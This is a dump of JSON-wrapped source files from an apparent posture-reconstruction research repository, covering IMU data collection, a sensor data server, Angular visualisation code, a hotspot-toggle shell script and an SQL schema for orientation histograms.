this.objectDragged = 'none';\n }\n handleMouseUp(event) {\n this.objectDragged = 'none';\n }\n\n toXYCoords(pos) {\n const sitetop = window.pageYOffset || document.documentElement.scrollTop;\n const siteleft = window.pageXOffset || document.documentElement.scrollLeft;\n const vector = pos.clone().project(this.camera);\n const rect = this.renderer.domElement.getBoundingClientRect();\n const vector2 = new THREE.Vector3(0, 0, 0);\n vector2.x = siteleft + rect.left + ( vector.x + 1) / 2 * (rect.right - rect.left);\n vector2.y = sitetop + rect.top + (-vector.y + 1) / 2 * (rect.bottom - rect.top);\n return vector2;\n }\n\n updateAxesNames() {\n this.setAxisNames(this.axisNames)\n const distance = this.AXIS_LENGTH * 1.1;\n const vectors = [new THREE.Vector3(distance, 0, 0), new THREE.Vector3(0, distance, 0), new THREE.Vector3(0, 0, distance)];\n const objects = [this.axisXName, this.axisYName, this.axisZName];\n for (let i = 0; i < objects.length; i++) {\n const position = this.toXYCoords(vectors[i]);\n objects[i].style.top = position.y + 'px';\n objects[i].style.left = position.x + 
'px';\n }\n }\n\n}\n"
},
{
"alpha_fraction": 0.6007773280143738,
"alphanum_fraction": 0.6557468175888062,
"avg_line_length": 37.29787063598633,
"blob_id": "efc5e4e344d3c58dccccf0d9fb793e5f6b9faf5d",
"content_id": "1957fc381ebfacfefa781a6628a37bb0b14cb45e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1801,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 47,
"path": "/python-code/filter.py",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom processStream import processRow\n\ndt = 0.05\nsigma = 0.1\nt = np.linspace(0, 100, 100/dt)\n\ninterpolatedData = processRow(['pipe1', 'pipe2','pipe3','pipe4'], t)\n_, leftQuat2, rightQuat2, _, _, _ = next(interpolatedData)\nleftPoswe2 = leftQuat2.rotate([0, 0, -1])\nrightPoswe2 = rightQuat2.rotate([0, 0, -1])\n_, leftQuat1, rightQuat1, _, _, _ = next(interpolatedData)\nleftPoswe1 = leftQuat1.rotate([0, 0, -1])\nrightPoswe1 = rightQuat1.rotate([0, 0, -1])\n\n_, leftQuat, rightQuat, _, leftAcc, rightAcc = next(interpolatedData)\nleftPoswe = leftQuat.rotate([0, 0, -1])\nrightPoswe = rightQuat.rotate([0, 0, -1])\nleftAccwe = (leftPoswe + leftPoswe2 - 2*leftPoswe1)/dt**2\nrightAccwe = (rightPoswe + rightPoswe2 - 2*rightPoswe1)/dt**2\nleftAccElbow = leftQuat.rotate(leftAcc) - leftAccwe\nrightAccElbow = rightQuat.rotate(rightAcc) - rightAccwe\n\ndef gaussian1D(sigma):\n x = np.linspace(-0.5, 0.51, 11)\n density = np.exp(np.square(x)/sigma)\n return density\n\ndef gaussian3D(u, sigma):\n x = np.linspace(-1, 1.01, 21) - u[0]\n y = np.linspace(-1, 1.01, 21) - u[1]\n z = np.linspace(-1, 1.01, 21) - u[2]\n xv, yv, zv = np.meshgrid(x, y, z)\n xv = np.expand_dims(xv, axis=-1)\n yv = np.expand_dims(xv, axis=-1)\n zv = np.expand_dims(xv, axis=-1)\n cat = np.concatenate(xv, yv, zv, axis=-1)\n density = np.exp(np.sum(np.matmul(cat, sigma)*cat, axis=-1))\n return density\n\ndef next(p1, p2, prior, acc):\n density = 2*p1 - p2 + t**2*acc\n kernel = gaussian1D(sigma)\n np.apply_along_axis(lambda m: np.convolve(m, kernel, mode='full'), axis=0, arr=density)\n np.apply_along_axis(lambda m: np.convolve(m, kernel, mode='full'), axis=1, arr=density)\n np.apply_along_axis(lambda m: np.convolve(m, kernel, mode='full'), axis=2, arr=density)\n return density*prior\n\n"
},
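filter.py builds its prediction from the constant-acceleration identity p(t+dt) = 2p(t) - p(t-dt) + dt^2 * a, which is exact for quadratic motion. A tiny sanity check with illustrative numbers:

```python
# The second-difference update is exact for x(t) = 0.5 * a * t**2.
dt, a = 0.05, 9.81
p_prev, p_now = 0.0, 0.5 * a * dt**2        # x(0) and x(dt)
p_next = 2 * p_now - p_prev + dt**2 * a     # predicted x(2*dt)
assert abs(p_next - 0.5 * a * (2 * dt)**2) < 1e-12
```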
{
"alpha_fraction": 0.5766888856887817,
"alphanum_fraction": 0.6106117963790894,
"avg_line_length": 27.983192443847656,
"blob_id": "c81af8c03adf425defe62c769fcaeaf29ca47567",
"content_id": "9e9def2015fcf0becc9feb9c5fe16905595981e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3449,
"license_type": "no_license",
"max_line_length": 204,
"num_lines": 119,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer_streamming/dataServer.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst net = require('net')\nconst os = require('os')\nconst dataServer = net.createServer()\n// const dbService = require('./db_service')\nconst realtimeVis = require('./realtimeVis')\nconst express = require('express')\nconst config = require('./config')\n\nvar app = express()\nvar macAddr\nconst platform = os.platform()\nif (platform === 'darwin') {\n macAddr = os.networkInterfaces().en3[0].mac\n} else if (platform === 'linux') {\n try {\n macAddr = os.networkInterfaces().wlan0[0].mac // change wlan0 to what ever interface you are using\n } catch (e) {\n macAddr = os.networkInterfaces().wlan1[0].mac // change wlan0 to what ever interface you are using\n }\n}\n\nconst machineId = mac2Id(macAddr)\n\ndataServer.on('connection', client => {\n client.on('data', processData)\n})\n\ndataServer.listen(config.PORT)\n\napp.get('/health', (req, res) => {\n res.end(JSON.stringify(sensorFreq))\n})\n\nvar appServer = app.listen(config.HEALTH_PORT)\n// realtimeVis.init(appServer)\n\nvar sensorFreq = {}\nvar counter = {}\n\nfunction processData (data) {\n var id = data.readUInt32LE(0)\n var idStr = id.toString()\n // console.log(idStr)\n if (counter.hasOwnProperty(idStr)) {\n counter[idStr] += 1\n } else {\n counter[idStr] = 0\n }\n var timestamp = data.readUInt32LE(4)\n var serverTimestamp = new Date().valueOf()\n switch (data.length) {\n case 60:\n var data100Hz = {\n quat: {\n w: data.readFloatLE(8),\n x: data.readFloatLE(12),\n y: data.readFloatLE(16),\n z: data.readFloatLE(20)\n },\n gyro: {\n x: data.readFloatLE(24),\n y: data.readFloatLE(28),\n z: data.readFloatLE(32)\n },\n lacc: {\n x: data.readFloatLE(36),\n y: data.readFloatLE(40),\n z: data.readFloatLE(44)\n },\n acc: {\n x: data.readFloatLE(48),\n y: data.readFloatLE(52),\n z: data.readFloatLE(56)\n }\n }\n realtimeVis.updateRealtimeVis(data100Hz.quat, idStr)\n var avgAcc = accMag(data100Hz.acc)\n // console.log(`acc_x: ${data100Hz.acc.x} acc_y: ${data100Hz.acc.y} acc_z: ${data100Hz.acc.z} acc_avg: ${avgAcc}`)\n // if (avgAcc < config.FREE_FALL_ACC_THRESHOLD) {\n // console.log('\\n\\n\\n\\n\\n\\n!!!!!!!!!!!!!!!\\n\\n\\n\\n\\n\\n')\n // }\n // dbService.insertSensorData100Hz(machineId, id, timestamp, serverTimestamp, data100Hz)\n break\n case 20:\n var data20Hz = {\n mag: {\n x: data.readFloatLE(8),\n y: data.readFloatLE(12),\n z: data.readFloatLE(16)\n }\n }\n // dbService.insertSensorData20Hz(machineId, id, timestamp, serverTimestamp, data20Hz)\n break\n case 12:\n var data1Hz = {\n temp: data.readFloatLE(8)\n }\n // dbService.insertSensorData1Hz(machineId, id, timestamp, serverTimestamp, data1Hz)\n break\n }\n}\n\nsetInterval(() => {\n var serverTimestamp = new Date().valueOf()\n Object.keys(counter).forEach(key => {\n sensorFreq[key] = counter[key]\n // dbService.insertHealth(machineId, parseInt(key), serverTimestamp, counter[key])\n counter[key] = 0\n })\n}, 1000)\n\nfunction mac2Id (mac) {\n return Buffer.from([Buffer.from(mac.substring(6, 8), 16), Buffer.from(mac.substring(9, 11), 16), Buffer.from(mac.substring(12, 14), 16), Buffer.from(mac.substring(15, 17), 16)].join('')).readUInt32LE(0)\n}\n\nfunction accMag (acc) {\n return Math.sqrt(acc.x * acc.x + acc.y * acc.y + acc.z * acc.z)\n}\n"
},
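The server derives its machine id from the low four bytes of the interface MAC address, read as a little-endian `uint32`. The same computation in Python, for reference (the MAC value is illustrative):

```python
# Low four bytes of the MAC, little-endian, as an unsigned 32-bit id.
import struct

def mac_to_id(mac: str) -> int:
    tail = bytes(int(octet, 16) for octet in mac.split(':')[2:])
    return struct.unpack('<I', tail)[0]

assert mac_to_id('b8:27:eb:01:02:03') == 0x030201eb
```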
{
"alpha_fraction": 0.7102615833282471,
"alphanum_fraction": 0.7102615833282471,
"avg_line_length": 23.850000381469727,
"blob_id": "31e17fbec296753241e118abb9856e062d4cfa87",
"content_id": "b2bf6cd046cbd0e8993d507584dbe616eedd4d52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 20,
"path": "/oriTrakHAR-master/rawDataVis/src/app/app.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit } from '@angular/core';\nimport { SockService } from './services/sock.service';\nimport { DataModelService } from './services/data-model.service';\nimport { Observable } from 'rxjs/Observable';\n\n@Component({\n selector: 'app-root',\n templateUrl: './app.component.html',\n styleUrls: ['./app.component.css']\n})\nexport class AppComponent implements OnInit {\n constructor(private dataModel: DataModelService, private sock: SockService) {\n\n }\n\n public ngOnInit() {\n\n }\n\n}\n"
},
{
"alpha_fraction": 0.3826998770236969,
"alphanum_fraction": 0.6395806074142456,
"avg_line_length": 22.84375,
"blob_id": "e4a8b49b6b60ee8eb17632e6446c2a7933e24e59",
"content_id": "8c0dbff78b726f70aff73e14b68defb400aa8385",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 763,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 32,
"path": "/oriTrakHAR-master/config.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "module.exports = {\n UPDATE_INTERVAL: 600, // sqlite database begin transaction - commit interval\n SOCKET_IO_PORT: 8088,\n EULER_ORDER: 'YZX',\n ANSWER_INTERVAL: 5,\n SENSOR_DICT: {\n '11212505': 'torso',\n '3080144': 'leftArm',\n '4257286': 'rightArm',\n '3074338': 'head'\n },\n PORT: 9000,\n HEALTH_PORT: 6000,\n POLL_INTERVAL_MIN: 50,\n POLL_INTERVAL_MAX: 100,\n TINY_SYNC_NUM_POINTS: 8,\n DEFAULT_TORSO_OFFSET: {\n w: -0.01483116439305834,\n x: 0.6592238955120293,\n y: 0.747234344297174,\n z: 0.08257845853418903\n },\n DEFAULT_HEAD_OFFSET: {\n w: -0.10168719246516468,\n x: 0.6256875209846358,\n y: 0.772480857046293,\n z: 0.038392103277664215\n },\n FREE_FALL_ACC_THRESHOLD: 1.2,\n STATIC_ACC_MIN: 9.7,\n STATIC_ACC_MAX: 9.9\n}\n"
},
{
"alpha_fraction": 0.6803953647613525,
"alphanum_fraction": 0.686985194683075,
"avg_line_length": 24.29166603088379,
"blob_id": "eb82f61a17b91050eed94e8719a4547af3da1e76",
"content_id": "0aff8c9383c2ad544795ccc8dd9a7617051dbc0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 607,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 24,
"path": "/hotspot_to_client.sh",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "function swap()\n{\n local TMPFILE=tmp.$$\n sudo mv \"$1\" $TMPFILE\n sudo mv \"$2\" \"$1\"\n sudo mv $TMPFILE \"$2\"\n}\n\nswap \"/etc/dnsmasq.conf\" \"/etc/dnsmasq.conf.save\"\nswap \"/etc/default/hostapd\" \"/etc/default/hostapd.save\"\nswap \"/etc/dhcpcd.conf\" \"/etc/dhcpcd.conf.save\"\nswap \"/etc/network/interfaces\" \"/etc/network/interfaces.save\"\n\nvariableA=$(systemctl is-active hostapd)\nif [ $variableA = \"active\" ]\nthen\n echo \"Hotspot stopped\"\n sudo systemctl stop hostapd\n sudo systemctl stop dnsmasq\nelse\n echo \"Hotspot started\"\n sudo systemctl start hostapd\n sudo systemctl start dnsmasq\nfi\n"
},
{
"alpha_fraction": 0.5912858247756958,
"alphanum_fraction": 0.6337160468101501,
"avg_line_length": 31.314496994018555,
"blob_id": "0fe70f704243b0d2f768bd81d0e904e2d51c0277",
"content_id": "aa607ea401810ea71e5610183200fea83ff1b093",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 13151,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 407,
"path": "/oriTrakHAR-master/dataProcessing/initOutputDb.sql",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "CREATE TABLE IF NOT EXISTS Preprocessed100HZData (\n interpolated_fixed_rate_time INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n\n torso_quat_w REAL DEFAULT NULL,\n torso_quat_x REAL DEFAULT NULL,\n torso_quat_y REAL DEFAULT NULL,\n torso_quat_z REAL DEFAULT NULL,\n torso_gyro_x REAL DEFAULT NULL,\n torso_gyro_y REAL DEFAULT NULL,\n torso_gyro_z REAL DEFAULT NULL,\n torso_acc_x REAL DEFAULT NULL,\n torso_acc_y REAL DEFAULT NULL,\n torso_acc_z REAL DEFAULT NULL,\n\n torso_acc_mag REAL DEFAULT NULL,\n torso_gyro_mag REAL DEFAULT NULL,\n torso_yaw REAL DEFAULT NULL,\n torso_pitch REAL DEFAULT NULL,\n torso_roll REAL DEFAULT NULL,\n\n\n head_quat_w REAL DEFAULT NULL,\n head_quat_x REAL DEFAULT NULL,\n head_quat_y REAL DEFAULT NULL,\n head_quat_z REAL DEFAULT NULL,\n head_gyro_x REAL DEFAULT NULL,\n head_gyro_y REAL DEFAULT NULL,\n head_gyro_z REAL DEFAULT NULL,\n head_acc_x REAL DEFAULT NULL,\n head_acc_y REAL DEFAULT NULL,\n head_acc_z REAL DEFAULT NULL,\n\n head_acc_mag REAL DEFAULT NULL,\n head_gyro_mag REAL DEFAULT NULL,\n head_yaw REAL DEFAULT NULL,\n head_pitch REAL DEFAULT NULL,\n head_roll REAL DEFAULT NULL,\n head_relative_yaw REAL DEFAULT NULL,\n head_relative_pitch REAL DEFAULT NULL,\n head_relative_roll REAL DEFAULT NULL,\n\n\n left_quat_w REAL DEFAULT NULL,\n left_quat_x REAL DEFAULT NULL,\n left_quat_y REAL DEFAULT NULL,\n left_quat_z REAL DEFAULT NULL,\n left_gyro_x REAL DEFAULT NULL,\n left_gyro_y REAL DEFAULT NULL,\n left_gyro_z REAL DEFAULT NULL,\n left_acc_x REAL DEFAULT NULL,\n left_acc_y REAL DEFAULT NULL,\n left_acc_z REAL DEFAULT NULL,\n\n left_acc_mag REAL DEFAULT NULL,\n left_gyro_mag REAL DEFAULT NULL,\n left_yaw REAL DEFAULT NULL,\n left_pitch REAL DEFAULT NULL,\n left_roll REAL DEFAULT NULL,\n left_relative_yaw REAL DEFAULT NULL,\n left_relative_pitch REAL DEFAULT NULL,\n left_relative_roll REAL DEFAULT NULL,\n\n\n right_quat_w REAL DEFAULT NULL,\n right_quat_x REAL DEFAULT NULL,\n right_quat_y REAL DEFAULT NULL,\n right_quat_z REAL DEFAULT NULL,\n right_gyro_x REAL DEFAULT NULL,\n right_gyro_y REAL DEFAULT NULL,\n right_gyro_z REAL DEFAULT NULL,\n right_acc_x REAL DEFAULT NULL,\n right_acc_y REAL DEFAULT NULL,\n right_acc_z REAL DEFAULT NULL,\n\n right_acc_mag REAL DEFAULT NULL,\n right_gyro_mag REAL DEFAULT NULL,\n right_yaw REAL DEFAULT NULL,\n right_roll REAL DEFAULT NULL,\n right_pitch REAL DEFAULT NULL,\n right_relative_yaw REAL DEFAULT NULL,\n right_relative_pitch REAL DEFAULT NULL,\n right_relative_roll REAL DEFAULT NULL\n);\n\nCREATE TABLE IF NOT EXISTS Preprocessed20HZData (\n interpolated_fixed_rate_time INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n\n torso_magn_x REAL DEFAULT NULL,\n torso_magn_y REAL DEFAULT NULL,\n torso_magn_z REAL DEFAULT NULL,\n torso_magn_mag REAL DEFAULT NULL,\n\n head_magn_x REAL DEFAULT NULL,\n head_magn_y REAL DEFAULT NULL,\n head_magn_z REAL DEFAULT NULL,\n head_magn_mag REAL DEFAULT NULL,\n\n\n left_magn_x REAL DEFAULT NULL,\n left_magn_y REAL DEFAULT NULL,\n left_magn_z REAL DEFAULT NULL,\n left_magn_mag REAL DEFAULT NULL,\n\n\n right_magn_x REAL DEFAULT NULL,\n right_magn_y REAL DEFAULT NULL,\n right_magn_z REAL DEFAULT NULL,\n right_magn_mag REAL DEFAULT NULL\n);\n\nCREATE TABLE IF NOT EXISTS PhoneData(\n timestamp REAL PRIMARY KEY,\n activity INTEGER NOT NULL,\n activity_confidence REAL NOT NULL,\n pedometer_num_steps REAL NOT NULL,\n pedometer_current_pace REAL NOT NULL,\n pedometer_current_cadence REAL NOT NULL,\n altimeter_relative_altitude REAL NOT NULL,\n altimeter_pressure REAL NOT 
NULL\n);\n\nCREATE TABLE IF NOT EXISTS GPSData(\n location_timestamp REAL PRIMARY KEY,\n timestamp REAL NOT NULL,\n location_latitude REAL NOT NULL,\n location_longitude REAL NOT NULL,\n location_altitude REAL NOT NULL,\n location_speed REAL NOT NULL,\n location_course REAL NOT NULL,\n location_vertical_accuracy REAL NOT NULL,\n location_horizontal_accuracy REAL NOT NULL,\n location_floor REAL NOT NULL,\n FOREIGN KEY (timestamp) REFERENCES PhoneData(timestamp)\n);\n\n-- Torso Histograms\nCREATE VIEW IF NOT EXISTS TorsoYawHist AS\n SELECT round(torso_yaw/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS TorsoPitchHist AS\n SELECT round(torso_pitch/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS TorsoRollHist AS\n SELECT round(torso_roll/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS TorsoYawPitchHist AS\n SELECT\n round(torso_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(torso_pitch/5.00 - 0.5)*5 AS pitch_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2\n ORDER BY 1, 2;\n\nCREATE VIEW IF NOT EXISTS TorsoYawPitchRollHist AS\n SELECT\n round(torso_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(torso_pitch/5.00 - 0.5)*5 AS pitch_floor,\n round(torso_roll/5.00 - 0.5)*5 AS roll_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3;\n\n\n-- Head Histograms\nCREATE VIEW IF NOT EXISTS HeadYawHist AS\n SELECT round(head_yaw/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS HeadPitchHist AS\n SELECT round(head_pitch/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS HeadRollHist AS\n SELECT round(head_roll/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS HeadYawPitchHist AS\n SELECT\n round(head_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(head_pitch/5.00 - 0.5)*5 AS pitch_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2\n ORDER BY 1, 2;\n\nCREATE VIEW IF NOT EXISTS HeadYawPitchRollHist AS\n SELECT\n round(head_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(head_pitch/5.00 - 0.5)*5 AS pitch_floor,\n round(head_roll/5.00 - 0.5)*5 AS roll_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3;\n\n\n-- Head Relative Histograms\nCREATE VIEW IF NOT EXISTS HeadRelativeYawHist AS\n SELECT round(head_relative_yaw/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS HeadRelativePitchHist AS\n SELECT round(head_relative_pitch/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS HeadRelativeRollHist AS\n SELECT round(head_relative_roll/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS HeadRelativeYawPitchHist AS\n SELECT\n round(head_relative_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(head_relative_pitch/5.00 - 0.5)*5 AS pitch_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2\n ORDER BY 1, 2;\n\nCREATE VIEW IF NOT EXISTS HeadRelativeYawPitchRollHist AS\n SELECT\n round(head_relative_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(head_relative_pitch/5.00 - 0.5)*5 AS pitch_floor,\n 
round(head_relative_roll/5.00 - 0.5)*5 AS roll_floor,\n    count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1, 2, 3\n  ORDER BY 1, 2, 3;\n\n\n-- Left Histogram\nCREATE VIEW IF NOT EXISTS LeftYawHist AS\n  SELECT round(left_yaw/5.00 - 0.5)*5 AS bucket_floor, count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1\n  ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS LeftPitchHist AS\n  SELECT round(left_pitch/5.00 - 0.5)*5 AS bucket_floor, count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1\n  ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS LeftRollHist AS\n  SELECT round(left_roll/5.00 - 0.5)*5 AS bucket_floor, count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1\n  ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS LeftYawPitchHist AS\n  SELECT\n    round(left_yaw/5.00 - 0.5)*5 AS yaw_floor,\n    round(left_pitch/5.00 - 0.5)*5 AS pitch_floor,\n    count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1, 2\n  ORDER BY 1, 2;\n\nCREATE VIEW IF NOT EXISTS LeftYawPitchRollHist AS\n  SELECT\n    round(left_yaw/5.00 - 0.5)*5 AS yaw_floor,\n    round(left_pitch/5.00 - 0.5)*5 AS pitch_floor,\n    round(left_roll/5.00 - 0.5)*5 AS roll_floor,\n    count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1, 2, 3\n  ORDER BY 1, 2, 3;\n\n\n-- Left Relative Histogram\nCREATE VIEW IF NOT EXISTS LeftRelativeYawHist AS\n  SELECT round(left_relative_yaw/5.00 - 0.5)*5 AS bucket_floor, count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1\n  ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS LeftRelativePitchHist AS\n  SELECT round(left_relative_pitch/5.00 - 0.5)*5 AS bucket_floor, count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1\n  ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS LeftRelativeRollHist AS\n  SELECT round(left_relative_roll/5.00 - 0.5)*5 AS bucket_floor, count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1\n  ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS LeftRelativeYawPitchHist AS\n  SELECT\n    round(left_relative_yaw/5.00 - 0.5)*5 AS yaw_floor,\n    round(left_relative_pitch/5.00 - 0.5)*5 AS pitch_floor,\n    count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1, 2\n  ORDER BY 1, 2;\n\nCREATE VIEW IF NOT EXISTS LeftRelativeYawPitchRollHist AS\n  SELECT\n    round(left_relative_yaw/5.00 - 0.5)*5 AS yaw_floor,\n    round(left_relative_pitch/5.00 - 0.5)*5 AS pitch_floor,\n    round(left_relative_roll/5.00 - 0.5)*5 AS roll_floor,\n    count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1, 2, 3\n  ORDER BY 1, 2, 3;\n\n\n-- Right histogram\nCREATE VIEW IF NOT EXISTS RightYawHist AS\n  SELECT round(right_yaw/5.00 - 0.5)*5 AS bucket_floor, count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1\n  ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS RightPitchHist AS\n  SELECT round(right_pitch/5.00 - 0.5)*5 AS bucket_floor, count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1\n  ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS RightRollHist AS\n  SELECT round(right_roll/5.00 - 0.5)*5 AS bucket_floor, count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1\n  ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS RightYawPitchHist AS\n  SELECT\n    round(right_yaw/5.00 - 0.5)*5 AS yaw_floor,\n    round(right_pitch/5.00 - 0.5)*5 AS pitch_floor,\n    count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1, 2\n  ORDER BY 1, 2;\n\nCREATE VIEW IF NOT EXISTS RightYawPitchRollHist AS\n  SELECT\n    round(right_yaw/5.00 - 0.5)*5 AS yaw_floor,\n    round(right_pitch/5.00 - 0.5)*5 AS pitch_floor,\n    round(right_roll/5.00 - 0.5)*5 AS roll_floor,\n    count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1, 2, 3\n  ORDER BY 1, 2, 3;\n\n-- Right Relative histogram\nCREATE VIEW IF NOT EXISTS RightRelativeYawHist AS\n  SELECT round(right_relative_yaw/5.00 - 0.5)*5 AS bucket_floor, count(*)\n  FROM Preprocessed100HZData\n  GROUP BY 1\n  ORDER BY 
1;\n\nCREATE VIEW IF NOT EXISTS RightRelativePitchHist AS\n SELECT round(right_relative_pitch/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS RightRelativeRollHist AS\n SELECT round(right_relative_roll/5.00 - 0.5)*5 AS bucket_floor, count(*)\n FROM Preprocessed100HZData\n GROUP BY 1\n ORDER BY 1;\n\nCREATE VIEW IF NOT EXISTS RightRelativeYawPitchHist AS\n SELECT\n round(right_relative_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(right_relative_pitch/5.00 - 0.5)*5 AS pitch_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2\n ORDER BY 1, 2;\n\nCREATE VIEW IF NOT EXISTS RightRelativeYawPitchRollHist AS\n SELECT\n round(right_relative_yaw/5.00 - 0.5)*5 AS yaw_floor,\n round(right_relative_pitch/5.00 - 0.5)*5 AS pitch_floor,\n round(right_relative_roll/5.00 - 0.5)*5 AS roll_floor,\n count(*)\n FROM Preprocessed100HZData\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3;"
},
{
"alpha_fraction": 0.6279317736625671,
"alphanum_fraction": 0.6321961879730225,
"avg_line_length": 32.5,
"blob_id": "fd755bd70590787a106fc2d762958148df833427",
"content_id": "3b094470045cf9bd3320714c714529096ff81295",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 938,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 28,
"path": "/oriTrakHAR-master/rawDataVis/src/app/modules/ng2-socket-io/ng2-socket-io.module.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { NgModule, ModuleWithProviders } from '@angular/core';\n// This module is a basically a copy-paste of the ng2-socket-io on npm.\n// Its angular version is < 4 and it doesn't play well with the rest of the code,\n// so I refactored it here.\nimport { SocketIoService } from './socket-io.service';\nimport { SocketIoConfig } from './socketIoConfig';\n\nexport function SocketFactory(config: SocketIoConfig) {\n return new SocketIoService(config);\n}\nexport const socketConfig = '__SOCKET_IO_CONFIG__';\n@NgModule({})\n\nexport class Ng2SocketIoModule {\n static forRoot(config: SocketIoConfig): ModuleWithProviders {\n return {\n ngModule: Ng2SocketIoModule,\n providers: [\n { provide: socketConfig, useValue: config },\n {\n provide: SocketIoService,\n useFactory: SocketFactory,\n deps : [socketConfig]\n }\n ]\n };\n }\n}\n"
},
{
"alpha_fraction": 0.552601158618927,
"alphanum_fraction": 0.5930635929107666,
"avg_line_length": 29.89285659790039,
"blob_id": "814572e1f197c4172f7c5279d4098c0400d1460c",
"content_id": "e5be0401a6153b4f0ab389c4410596447ce5829a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 865,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 28,
"path": "/oriTrakHAR-master/sensorDataCollection/webCam/runWebCam.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
